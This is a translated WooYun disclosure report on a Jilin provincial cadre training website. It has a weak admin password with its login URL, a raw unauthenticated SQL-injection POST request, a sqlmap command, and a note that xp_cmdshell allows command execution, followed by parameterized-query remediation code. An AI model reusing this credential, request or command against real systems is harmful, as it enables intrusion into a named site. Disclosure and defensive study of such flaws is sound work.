
Vulnerability Summary

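Bug ID: wooyun-2015-0107875

Title: SQL injection vulnerability and weak password in the Jilin Province Leading Cadre Online Training Academy

Vendor: Organization Department of the Jilin Provincial Party Committee

Author: 路人甲

Submitted: 2015-04-16 14:40

Fixed: 2015-06-05 11:48

Disclosed: 2015-06-05 11:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (cncert, the National Internet Emergency Center) for handling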

Source: http://www.wooyun.org


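Vulnerability Details

Disclosure status:

2015-04-16: Details reported to the vendor; awaiting vendor handling
2015-04-21: Vendor confirmed; details disclosed to the vendor only
2015-05-01: Details disclosed to core white hats and experts in related fields
2015-05-11: Details disclosed to regular white hats
2015-05-21: Details disclosed to intern white hats
2015-06-05: Details disclosed to the public

Brief description:

Once this system is successfully taken over, the online course content can be modified and exam cheating becomes possible; the main site's publicity function could also be used to publish false or reactionary content or phishing messages.

Detailed description:

The Jilin Province Leading Cadre Online Training Academy has a SQL injection vulnerability and a weak password.

Proof of vulnerability:

Weak password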

www.jlgbjy.cn/Admin/flogin.aspx?id=18


songyuan/123456


[Screenshot taken 2015-04-14 16:05:21]


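SQL injection vulnerability
Note: the injection works without logging in
The injection point is in the back-end search function
The POST data is as follows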

POST /Admin/findextpeople.aspx?id=18 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.jlgbjy.cn/Admin/findextpeople.aspx?id=18
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 2706
DNT: 1
Host: www.jlgbjy.cn
Pragma: no-cache
Cookie: ASP.NET_SessionId=pdowq3ndyc1yxnbuwjquiivg

__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=[VIEWSTATE value omitted]&__VIEWSTATEGENERATOR=EC8D21FC&txtDeptName=%C3%F1%BD%A8%CB%C9%D4%AD%CA%D0%CE%AF&ddl_jb=00&ddl_jb2=00&ddl_sex=00&ddl_mz=00&ddl_dp=00&ddl_age=00&btnSelect=%B2%E9%D1%AF


sqlmap injection parameters

sqlmap -r /root/sy -p"txtDeptName" --level=5 --dbs


The result is as follows

[Screenshot taken 2015-04-14 16:07:52]


The database is MSSQL, so system commands can be executed via xpcmd (xp_cmdshell)

Remediation:

Change the password so that it meets complexity requirements
Filter input and output
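
For the search field reported above (txtDeptName), binding the value as a query parameter is more reliable than filtering it. The following is an added example, not code from the original report or from the affected site; the class, table and column names (PeopleSearch, People, PersonId, PersonName, DeptName) are hypothetical.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Added example: hypothetical data-access helper for a department-name search.
// Table and column names are assumptions, not taken from the affected site.
public static class PeopleSearch
{
    // Pattern to avoid (shown only for contrast): building the statement by
    // concatenation lets the form value change the structure of the query.
    //   "SELECT ... WHERE DeptName LIKE '%" + txtDeptName.Text + "%'"

    // Escape T-SQL LIKE wildcards so the input is matched literally.
    // '[' must be handled first because the other escapes introduce brackets.
    public static string EscapeLike(string value)
    {
        return value.Replace("[", "[[]").Replace("%", "[%]").Replace("_", "[_]");
    }

    public static DataTable FindByDeptName(string connectionString, string deptName)
    {
        if (deptName == null)
            throw new ArgumentNullException(nameof(deptName));
        if (deptName.Length > 50)
            throw new ArgumentException("Department name too long.", nameof(deptName));

        const string sql =
            "SELECT PersonId, PersonName, DeptName FROM People " +
            "WHERE DeptName LIKE @dept ORDER BY PersonId";

        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            // The value is sent as a typed parameter, never as SQL text.
            // Size 152 = 50 characters escaped to at most 150, plus two '%'.
            cmd.Parameters.Add("@dept", SqlDbType.NVarChar, 152).Value =
                "%" + EscapeLike(deptName) + "%";

            var table = new DataTable();
            using (var adapter = new SqlDataAdapter(cmd))
            {
                adapter.Fill(table); // Fill opens and closes the connection itself
            }
            return table;
        }
    }
}
```

Running the application under a database login that is not a member of sysadmin also keeps xp_cmdshell out of reach of the web application.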

Copyright notice: when reposting, please credit the source 路人甲@乌云


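Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-04-21 11:47

Vendor reply:

CNVD has confirmed and reproduced the situation described and has forwarded it through CNCERT to the Jilin sub-center, which will coordinate follow-up handling with the organization that manages the website.

Latest status:

None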